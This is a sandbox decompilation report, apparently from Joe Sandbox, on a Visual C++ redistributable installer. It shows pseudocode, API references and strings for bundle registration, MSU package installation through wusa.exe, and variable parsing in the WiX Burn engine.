                                                                          0x00020409
                                                                          0x00020416

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000,?,?,?), ref: 00020409
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.10.4.4718$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$userVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
                                                                          • API String ID: 3535843008-3978993339
                                                                          • Opcode ID: 05b3e84db506a6779c65837778f88e2a994e10e13fad73fab37f5ce59157f429
                                                                          • Instruction ID: ab97002e4379d280ffe40471d68506d802655884cef911ef35a9b9292df56712
                                                                          • Opcode Fuzzy Hash: 05b3e84db506a6779c65837778f88e2a994e10e13fad73fab37f5ce59157f429
                                                                          • Instruction Fuzzy Hash: C2F1DA31A80B36FBDB229654DD42BEF76AABF00711F144651FD00BA653D7B2AE6097C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00036A85(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                          				struct _SECURITY_ATTRIBUTES* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				long _v28;
                                                                          				char _v32;
                                                                          				char _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				struct _PROCESS_INFORMATION _v60;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				char _v76;
                                                                          				struct _STARTUPINFOW _v144;
                                                                          				void* __edi;
                                                                          				void* _t111;
                                                                          				void* _t114;
                                                                          				intOrPtr* _t115;
                                                                          				intOrPtr _t116;
                                                                          				void* _t128;
                                                                          				struct _SECURITY_ATTRIBUTES* _t147;
                                                                          				void* _t148;
                                                                          				void* _t149;
                                                                          				void* _t150;
                                                                          				signed short _t152;
                                                                          				signed short _t157;
                                                                          				struct _SECURITY_ATTRIBUTES* _t189;
                                                                          				void* _t202;
                                                                          				intOrPtr* _t205;
                                                                          				void* _t206;
                                                                          				intOrPtr _t208;
                                                                          				void* _t211;
                                                                          				void* _t212;
                                                                          				void* _t213;
                                                                          
                                                                          				_t199 = __ecx;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_v32 = 0;
                                                                          				_v24 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v44 = 0;
                                                                          				_v40 = 0;
                                                                          				E0003F670(_t202,  &_v144, 0, 0x44);
                                                                          				_v28 = 0;
                                                                          				_v36 = 0;
                                                                          				asm("stosd");
                                                                          				_t212 = _t211 + 0xc;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				if(E000509BB(_t199, GetCurrentProcess(),  &_v36) >= 0) {
                                                                          					_t205 = _a28;
                                                                          					 *_t205 = 0;
                                                                          					if(_v36 == 0) {
                                                                          						if(E000134C5(_t199, _t205, 0x25,  &_v24) >= 0) {
                                                                          							goto L10;
                                                                          						} else {
                                                                          							_push("Failed to find System32 directory.");
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						_t189 = E000134C5(_t199, _t205, 0x24,  &_v32);
                                                                          						if(_t189 >= 0) {
                                                                          							_t189 = E00012D79(_t199, _v32, L"SysNative\\",  &_v24);
                                                                          							if(_t189 >= 0) {
                                                                          								L10:
                                                                          								if(E00012D79(_t199, _v24, L"wusa.exe",  &_v8) >= 0) {
                                                                          									_t208 = _a4;
                                                                          									_t111 =  *((intOrPtr*)(_t208 + 0x10)) - 1;
                                                                          									if(_t111 == 0) {
                                                                          										_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x94)));
                                                                          										_t114 = E00011F20( &_v12, L"\"%ls\" /uninstall /kb:%ls /quiet /norestart", _v8);
                                                                          										_t213 = _t212 + 0x10;
                                                                          										if(_t114 >= 0) {
                                                                          											goto L23;
                                                                          										} else {
                                                                          											_push("Failed to format MSU uninstall command.");
                                                                          											goto L2;
                                                                          										}
                                                                          									} else {
                                                                          										if(_t111 == 1) {
                                                                          											_t189 = E0002A189(_t199, 1,  *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x24)),  &_v16);
                                                                          											if(_t189 >= 0) {
                                                                          												E00018197(_a8, L"WixBundleExecutePackageCacheFolder", _v16, 1);
                                                                          												_t189 = E00012D79(_t199, _v16,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x7c)))) + 0x18)),  &_v20);
                                                                          												if(_t189 >= 0) {
                                                                          													_push(_v20);
                                                                          													_t189 = E00011F20( &_v12, L"\"%ls\" \"%ls\" /quiet /norestart", _v8);
                                                                          													_t213 = _t212 + 0x10;
                                                                          													if(_t189 >= 0) {
                                                                          														L23:
                                                                          														_t115 =  *((intOrPtr*)(_t208 + 0xc));
                                                                          														if(_t115 == 0) {
                                                                          															L29:
                                                                          															_t116 = _v20;
                                                                          															if(_t116 == 0) {
                                                                          																_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x94));
                                                                          															}
                                                                          															_push(_v12);
                                                                          															_push(_t116);
                                                                          															_push(E00023BB0( *((intOrPtr*)(_t208 + 0x10))));
                                                                          															_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)))));
                                                                          															E0001550F(2, 0x2000012d, E000242A2(_a12));
                                                                          															_t212 = _t213 + 0x1c;
                                                                          															if(E0003678F(_a16,  &_v44,  &_v40) >= 0) {
                                                                          																_v144.cb = 0x44;
                                                                          																if(CreateProcessW(_v8, _v12, 0, 0, 0, 0x8000000, 0, 0,  &_v144,  &_v60) != 0) {
                                                                          																	while(1) {
                                                                          																		_v76 = 2;
                                                                          																		_v68 = 0x32;
                                                                          																		_v72 = 1;
                                                                          																		_t128 = _a20( &_v76, _a24);
                                                                          																		if(_t128 != 1 && _t128 != 0) {
                                                                          																			break;
                                                                          																		}
                                                                          																		_t189 = E00050917(_t199, _v60.hProcess, 0x1f4,  &_v28);
                                                                          																		if(_t189 == 0x80070102) {
                                                                          																			continue;
                                                                          																		} else {
                                                                          																			if(_t189 < 0) {
                                                                          																				_push(_v8);
                                                                          																				_push("Failed to wait for executable to complete: %ls");
                                                                          																				goto L51;
                                                                          																			} else {
                                                                          																				if(GetExitCodeProcess(_v60.hProcess,  &_v28) != 0) {
                                                                          																					_t189 =  ==  ? 0xbc2 : _v28;
                                                                          																					_v28 = _t189;
                                                                          																					_t147 = _t189;
                                                                          																					if(_t147 == 0) {
                                                                          																						L49:
                                                                          																						_t189 = 0;
                                                                          																					} else {
                                                                          																						_t148 = _t147 - 1;
                                                                          																						if(_t148 == 0) {
                                                                          																							goto L49;
                                                                          																						} else {
                                                                          																							_t149 = _t148 - 0xbc1;
                                                                          																							if(_t149 == 0) {
                                                                          																								L48:
                                                                          																								 *_t205 = 1;
                                                                          																								goto L49;
                                                                          																							} else {
                                                                          																								_t150 = _t149 - 0x23f443;
                                                                          																								if(_t150 == 0) {
                                                                          																									goto L48;
                                                                          																								} else {
                                                                          																									if(_t150 == 1) {
                                                                          																										goto L49;
                                                                          																									} else {
                                                                          																									}
                                                                          																								}
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				} else {
                                                                          																					_t152 = GetLastError();
                                                                          																					_t193 =  <=  ? _t152 : _t152 & 0x0000ffff | 0x80070000;
                                                                          																					_t189 =  >=  ? 0x80004005 :  <=  ? _t152 : _t152 & 0x0000ffff | 0x80070000;
                                                                          																					E000137D3(0x80004005, "msuengine.cpp", 0x177, _t189);
                                                                          																					_push("Failed to get process exit code.");
                                                                          																					goto L2;
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																		goto L52;
                                                                          																	}
                                                                          																	_t189 = (0 | _t128 != 0x00000002) + 0x80070642;
                                                                          																	E000137D3(_t128, "msuengine.cpp", 0x16a, _t189);
                                                                          																	_push("Bootstrapper application aborted during MSU progress.");
                                                                          																	goto L2;
                                                                          																} else {
                                                                          																	_t157 = GetLastError();
                                                                          																	_t198 =  <=  ? _t157 : _t157 & 0x0000ffff | 0x80070000;
                                                                          																	_t189 =  >=  ? 0x80004005 :  <=  ? _t157 : _t157 & 0x0000ffff | 0x80070000;
                                                                          																	E000137D3(0x80004005, "msuengine.cpp", 0x160, _t189);
                                                                          																	_push(_v8);
                                                                          																	_push("Failed to CreateProcess on path: %ls");
                                                                          																	goto L51;
                                                                          																}
                                                                          															} else {
                                                                          																_push("Failed to ensure WU service was enabled to install MSU package.");
                                                                          																goto L2;
                                                                          															}
                                                                          														} else {
                                                                          															_t199 = 0;
                                                                          															if( *_t115 == 0) {
                                                                          																goto L29;
                                                                          															} else {
                                                                          																_t189 = E00011EF2( &_v12, L" /log:", 0);
                                                                          																if(_t189 >= 0) {
                                                                          																	_t189 = E00011EF2( &_v12,  *((intOrPtr*)(_t208 + 0xc)), 0);
                                                                          																	if(_t189 >= 0) {
                                                                          																		goto L29;
                                                                          																	} else {
                                                                          																		_push("Failed to append log path to MSU command-line.");
                                                                          																		goto L2;
                                                                          																	}
                                                                          																} else {
                                                                          																	_push("Failed to append log switch to MSU command-line.");
                                                                          																	goto L2;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_push("Failed to format MSU install command.");
                                                                          														goto L2;
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to build MSU path.");
                                                                          													goto L2;
                                                                          												}
                                                                          											} else {
                                                                          												_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)))));
                                                                          												_push("Failed to get cached path for package: %ls");
                                                                          												L51:
                                                                          												_push(_t189);
                                                                          												E0005012F();
                                                                          											}
                                                                          										} else {
                                                                          											_t189 = 0x8000ffff;
                                                                          											_push("Failed to get action arguments for MSU package.");
                                                                          											goto L2;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to allocate WUSA.exe path.");
                                                                          									goto L2;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to append SysNative directory.");
                                                                          								goto L2;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to find Windows directory.");
                                                                          							goto L2;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to determine WOW64 status.");
                                                                          					L2:
                                                                          					_push(_t189);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L52:
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				if(_v20 != 0) {
                                                                          					E000554EF(_v20);
                                                                          				}
                                                                          				if(_v24 != 0) {
                                                                          					E000554EF(_v24);
                                                                          				}
                                                                          				if(_v32 != 0) {
                                                                          					E000554EF(_v32);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v60.hProcess == 0) {
                                                                          					_t206 = 0;
                                                                          				} else {
                                                                          					CloseHandle(_v60.hProcess);
                                                                          					_t206 = 0;
                                                                          					_v60 = 0;
                                                                          				}
                                                                          				if(_v60.hThread != 0) {
                                                                          					CloseHandle(_v60.hThread);
                                                                          					_v60.hThread = _t206;
                                                                          				}
                                                                          				if(_v40 != 0) {
                                                                          					E00036945(_v44, 4);
                                                                          				}
                                                                          				E00018197(_a8, L"WixBundleExecutePackageCacheFolder", _t206, 1);
                                                                          				return _t189;
                                                                          			}


                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0002BBCA,00000007,?,?,?), ref: 00036AD9
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                          • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00036EC9
                                                                          • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00036EDD
                                                                          Strings
                                                                          • Failed to get cached path for package: %ls, xrefs: 00036BB5
                                                                          • Failed to allocate WUSA.exe path., xrefs: 00036B6C
                                                                          • "%ls" "%ls" /quiet /norestart, xrefs: 00036C01
                                                                          • Failed to find System32 directory., xrefs: 00036B4E
                                                                          • Failed to ensure WU service was enabled to install MSU package., xrefs: 00036CE7
                                                                          • SysNative\, xrefs: 00036B23
                                                                          • 2, xrefs: 00036D6C
                                                                          • Bootstrapper application aborted during MSU progress., xrefs: 00036E0D
                                                                          • Failed to find Windows directory., xrefs: 00036B18
                                                                          • msuuser.cpp, xrefs: 00036D46, 00036DDB, 00036E03
                                                                          • Failed to get action arguments for MSU package., xrefs: 00036B8F
                                                                          • /log:, xrefs: 00036C5B
                                                                          • Failed to append log switch to MSU command-line., xrefs: 00036C6F
                                                                          • wusa.exe, xrefs: 00036B59
                                                                          • Failed to build MSU path., xrefs: 00036BEE
                                                                          • D, xrefs: 00036CF4
                                                                          • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00036C2E
                                                                          • Failed to determine WOW64 status., xrefs: 00036AEB
                                                                          • WixBundleExecutePackageCacheFolder, xrefs: 00036BC4, 00036EF5
                                                                          • Failed to get process exit code., xrefs: 00036DE5
                                                                          • Failed to append SysNative directory., xrefs: 00036B36
                                                                          • Failed to format MSU uninstall command., xrefs: 00036C42
                                                                          • Failed to CreateProcess on path: %ls, xrefs: 00036D53
                                                                          • Failed to wait for executable to complete: %ls, xrefs: 00036E58
                                                                          • @Met, xrefs: 00036D22, 00036DB7
                                                                          • Failed to format MSU install command., xrefs: 00036C15
                                                                          • Failed to append log path to MSU command-line., xrefs: 00036C8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                          • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$@Met$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuuser.cpp$wusa.exe
                                                                          • API String ID: 1400713077-1568090568
                                                                          • Opcode ID: 6b1fd490d6fa6f19eeada7f9a4fcbbaa4252df738ac186ad342c7c479f865b41
                                                                          • Instruction ID: f611b172fb661f3737b6df55ce05cadb3de4e9d6d8b0c2c1513b61c0a37c0ecb
                                                                          • Opcode Fuzzy Hash: 6b1fd490d6fa6f19eeada7f9a4fcbbaa4252df738ac186ad342c7c479f865b41
                                                                          • Instruction Fuzzy Hash: BAD1B275B0070ABFDB129FE5CC85EEEBBBDAF04704F108026F601A6162D7B69E449B51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E0001834D(struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				char _v20;
                                                                          				void* _v24;
                                                                          				int _v28;
                                                                          				char _v32;
                                                                          				char _v36;
                                                                          				void _v60;
                                                                          				intOrPtr* _t97;
                                                                          				int _t148;
                                                                          				struct _CRITICAL_SECTION* _t154;
                                                                          				signed int _t155;
                                                                          				intOrPtr* _t158;
                                                                          				signed int _t159;
                                                                          				int _t169;
                                                                          				signed int _t170;
                                                                          				void* _t171;
                                                                          				signed int _t172;
                                                                          				struct _CRITICAL_SECTION* _t174;
                                                                          				void* _t176;
                                                                          				int _t177;
                                                                          				void* _t179;
                                                                          				void* _t180;
                                                                          
                                                                          				_t154 = _a4;
                                                                          				_t155 = 6;
                                                                          				_v24 = 0;
                                                                          				_v16 = 0;
                                                                          				memset( &_v60, 0, _t155 << 2);
                                                                          				_t180 = _t179 + 0xc;
                                                                          				_v32 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v36 = 0;
                                                                          				_v28 = 0;
                                                                          				EnterCriticalSection(_t154);
                                                                          				if(E00053803(_a8, L"Variable",  &_v24) >= 0) {
                                                                          					_t97 = _v24;
                                                                          					_t166 =  &_v32;
                                                                          					_t157 =  *_t97;
                                                                          					_t176 =  *((intOrPtr*)( *_t97 + 0x20))(_t97,  &_v32);
                                                                          					if(_t176 >= 0) {
                                                                          						_t169 = 0;
                                                                          						_a4 = 0;
                                                                          						if(_v32 > 0) {
                                                                          							while(1) {
                                                                          								_t176 = E00053760(_t157, _v24,  &_v16, _t169);
                                                                          								if(_t176 < 0) {
                                                                          									break;
                                                                          								}
                                                                          								_t176 = E000531C7(_v16, L"Id",  &_v8);
                                                                          								if(_t176 < 0) {
                                                                          									_push("Failed to get @Id.");
                                                                          									goto L57;
                                                                          								} else {
                                                                          									_t176 = E000533DB(_t157, _v16, L"Hidden",  &_v20);
                                                                          									if(_t176 < 0) {
                                                                          										_push("Failed to get @Hidden.");
                                                                          										goto L57;
                                                                          									} else {
                                                                          										_t176 = E000533DB(_t157, _v16, L"Persisted",  &_v36);
                                                                          										if(_t176 < 0) {
                                                                          											_push("Failed to get @Persisted.");
                                                                          											goto L57;
                                                                          										} else {
                                                                          											_t176 = E000531C7(_v16, L"Value",  &_v12);
                                                                          											if(_t176 == 0x80070490) {
                                                                          												_t177 = _t169;
                                                                          												goto L25;
                                                                          											} else {
                                                                          												if(_t176 < 0) {
                                                                          													_push("Failed to get @Value.");
                                                                          													goto L57;
                                                                          												} else {
                                                                          													_t176 = E000302F4( &_v60, _v12, _t169);
                                                                          													if(_t176 < 0) {
                                                                          														_push("Failed to set variant value.");
                                                                          														goto L57;
                                                                          													} else {
                                                                          														_t176 = E000531C7(_v16, L"Type",  &_v12);
                                                                          														if(_t176 < 0) {
                                                                          															_push("Failed to get @Type.");
                                                                          															goto L57;
                                                                          														} else {
                                                                          															_t148 = CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"numeric", 0xffffffff);
                                                                          															_t177 = 2;
                                                                          															if(_t148 != _t177) {
                                                                          																if(CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"string", 0xffffffff) != _t177) {
                                                                          																	if(CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"version", 0xffffffff) != _t177) {
                                                                          																		_push(_v12);
                                                                          																		_t171 = 0x80070057;
                                                                          																		_t176 = 0x80070057;
                                                                          																		_push("Invalid value for @Type: %ls");
                                                                          																		goto L42;
                                                                          																	} else {
                                                                          																		if(_v20 == 0) {
                                                                          																			_push(_v60);
                                                                          																			E0005061A(_t177, "Initializing version variable \'%ls\' to value \'%ls\'", _v8);
                                                                          																			_t180 = _t180 + 0x10;
                                                                          																		}
                                                                          																		_t177 = 3;
                                                                          																		goto L25;
                                                                          																	}
                                                                          																} else {
                                                                          																	if(_v20 != 0) {
                                                                          																		goto L26;
                                                                          																	} else {
                                                                          																		_push(_v60);
                                                                          																		E0005061A(_t177, "Initializing string variable \'%ls\' to value \'%ls\'", _v8);
                                                                          																		_t180 = _t180 + 0x10;
                                                                          																		goto L25;
                                                                          																	}
                                                                          																	goto L27;
                                                                          																}
                                                                          															} else {
                                                                          																if(_v20 == 0) {
                                                                          																	_push(_v60);
                                                                          																	E0005061A(_t177, "Initializing numeric variable \'%ls\' to value \'%ls\'", _v8);
                                                                          																	_t180 = _t180 + 0x10;
                                                                          																}
                                                                          																_t177 = 1;
                                                                          																L25:
                                                                          																if(_v20 != 0) {
                                                                          																	L26:
                                                                          																	E0005061A(2, "Initializing hidden variable \'%ls\'", _v8);
                                                                          																	_t180 = _t180 + 0xc;
                                                                          																}
                                                                          																L27:
                                                                          																_t176 = E0002FEB7(_t166,  &_v60, _t177);
                                                                          																if(_t176 < 0) {
                                                                          																	_push("Failed to change variant type.");
                                                                          																	goto L57;
                                                                          																} else {
                                                                          																	_t176 = E000155B6(_t157, _t154, _v8,  &_v28);
                                                                          																	if(_t176 < 0) {
                                                                          																		_push(_v8);
                                                                          																		_push("Failed to find variable value \'%ls\'.");
                                                                          																		goto L51;
                                                                          																	} else {
                                                                          																		_t170 = _v28;
                                                                          																		if(_t176 != 1) {
                                                                          																			_t53 = _t154 + 0x20; // 0x85f08bff
                                                                          																			_t124 =  *_t53;
                                                                          																			if( *((intOrPtr*)(_t170 * 0x38 +  *_t53 + 0x2c)) > 0) {
                                                                          																				_t171 = 0x80070057;
                                                                          																				_t176 = 0x80070057;
                                                                          																				E000137D3(_t124, "variable.cpp", 0x18a, 0x80070057);
                                                                          																				_push(_v8);
                                                                          																				_push("Attempt to set built-in variable value: %ls");
                                                                          																				L42:
                                                                          																				_push(_t171);
                                                                          																				goto L43;
                                                                          																			} else {
                                                                          																				goto L33;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_t176 = E00016AC6(_t122, _t157, _t154, _v8, _t170);
                                                                          																			if(_t176 >= 0) {
                                                                          																				L33:
                                                                          																				_t56 = _t154 + 0x20; // 0x85f08bff
                                                                          																				_t172 = _t170 * 0x38;
                                                                          																				 *((intOrPtr*)(_t172 +  *_t56 + 0x20)) = _v20;
                                                                          																				_t60 = _t154 + 0x20; // 0x85f08bff
                                                                          																				 *((intOrPtr*)(_t172 +  *_t60 + 0x28)) = _v36;
                                                                          																				_t65 = _t154 + 0x20; // 0x85f08bff
                                                                          																				_t176 = E0003035B(_t166,  *_t65 + 8 + _t172,  &_v60);
                                                                          																				if(_t176 < 0) {
                                                                          																					_push(_v8);
                                                                          																					_push("Failed to set value of variable: %ls");
                                                                          																					goto L51;
                                                                          																				} else {
                                                                          																					_t66 = _t154 + 0x20; // 0x85f08bff
                                                                          																					_t176 = E00030246( *_t66 + 8 + _t172, _v20);
                                                                          																					if(_t176 < 0) {
                                                                          																						_push("Failed to set variant encryption");
                                                                          																						goto L57;
                                                                          																					} else {
                                                                          																						_t157 = _v16;
                                                                          																						if(_t157 != 0) {
                                                                          																							 *((intOrPtr*)( *_t157 + 8))(_t157);
                                                                          																							_v16 = _v16 & 0x00000000;
                                                                          																						}
                                                                          																						E00030499( &_v60);
                                                                          																						if(_v12 != 0) {
                                                                          																							E00012793(_v12);
                                                                          																							_v12 = _v12 & 0x00000000;
                                                                          																						}
                                                                          																						_t174 = _a4 + 1;
                                                                          																						_a4 = _t174;
                                                                          																						if(_t174 < _v32) {
                                                                          																							_t169 = 0;
                                                                          																							continue;
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				_push(_v8);
                                                                          																				_push("Failed to insert variable \'%ls\'.");
                                                                          																				L51:
                                                                          																				_push(_t176);
                                                                          																				L43:
                                                                          																				E0005012F();
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								goto L58;
                                                                          							}
                                                                          							_push("Failed to get next node.");
                                                                          							goto L57;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get variable node count.");
                                                                          						goto L57;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to select variable nodes.");
                                                                          					L57:
                                                                          					_push(_t176);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L58:
                                                                          				LeaveCriticalSection(_t154);
                                                                          				_t158 = _v24;
                                                                          				if(_t158 != 0) {
                                                                          					 *((intOrPtr*)( *_t158 + 8))(_t158);
                                                                          				}
                                                                          				_t159 = _v16;
                                                                          				if(_t159 != 0) {
                                                                          					 *((intOrPtr*)( *_t159 + 8))(_t159);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				E00030499( &_v60);
                                                                          				return _t176;
                                                                          			}



























                                                                          0x000186a6
                                                                          0x000186a9
                                                                          0x00000000
                                                                          0x00018582
                                                                          0x00018582
                                                                          0x00018588
                                                                          0x000185a7
                                                                          0x000185a7
                                                                          0x000185b2
                                                                          0x00018685
                                                                          0x00018695
                                                                          0x00018697
                                                                          0x0001869c
                                                                          0x0001869f
                                                                          0x00018654
                                                                          0x00018654
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001858a
                                                                          0x00018594
                                                                          0x00018598
                                                                          0x000185b8
                                                                          0x000185b8
                                                                          0x000185be
                                                                          0x000185c1
                                                                          0x000185c5
                                                                          0x000185cb
                                                                          0x000185d3
                                                                          0x000185e1
                                                                          0x000185e5
                                                                          0x0001867b
                                                                          0x0001867e
                                                                          0x00000000
                                                                          0x000185eb
                                                                          0x000185eb
                                                                          0x000185fc
                                                                          0x00018600
                                                                          0x00018674
                                                                          0x00000000
                                                                          0x00018602
                                                                          0x00018602
                                                                          0x00018607
                                                                          0x0001860c
                                                                          0x0001860f
                                                                          0x0001860f
                                                                          0x00018617
                                                                          0x00018620
                                                                          0x00018625
                                                                          0x0001862a
                                                                          0x0001862a
                                                                          0x00018631
                                                                          0x00018632
                                                                          0x00018638
                                                                          0x0001863e
                                                                          0x00000000
                                                                          0x0001863e
                                                                          0x00018638
                                                                          0x00018600
                                                                          0x0001859a
                                                                          0x0001859a
                                                                          0x0001859d
                                                                          0x000186ae
                                                                          0x000186ae
                                                                          0x00018655
                                                                          0x00018655
                                                                          0x0001865a
                                                                          0x00018598
                                                                          0x00018588
                                                                          0x0001857c
                                                                          0x00018565
                                                                          0x000184ab
                                                                          0x0001848b
                                                                          0x00018470
                                                                          0x00018459
                                                                          0x00018451
                                                                          0x00018432
                                                                          0x00018417
                                                                          0x00000000
                                                                          0x000183fc
                                                                          0x000186cd
                                                                          0x00000000
                                                                          0x000186cd
                                                                          0x000183b8
                                                                          0x000183b8
                                                                          0x00000000
                                                                          0x000183b8
                                                                          0x0001839b
                                                                          0x0001839b
                                                                          0x000186d2
                                                                          0x000186d2
                                                                          0x000186d3
                                                                          0x000186d9
                                                                          0x000186da
                                                                          0x000186db
                                                                          0x000186e1
                                                                          0x000186e6
                                                                          0x000186eb
                                                                          0x000186eb
                                                                          0x000186ee
                                                                          0x000186f3
                                                                          0x000186f8
                                                                          0x000186f8
                                                                          0x000186ff
                                                                          0x00018704
                                                                          0x00018704
                                                                          0x0001870d
                                                                          0x00018712
                                                                          0x00018712
                                                                          0x0001871b
                                                                          0x00018728

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0001533D,?,00000000,80070490,?,?,?,?,?,?,?,?,0003BF87,?,0001533D,?), ref: 0001837E
                                                                          • LeaveCriticalSection.KERNEL32(0001533D,?,?,?,?,?,?,?,?,0003BF87,?,0001533D,?,0001533D,0001533D,Chain), ref: 000186DB
                                                                          Strings
                                                                          • string, xrefs: 000184CE
                                                                          • Type, xrefs: 0001847A
                                                                          • version, xrefs: 00018503
                                                                          • Failed to set variant encryption, xrefs: 00018674
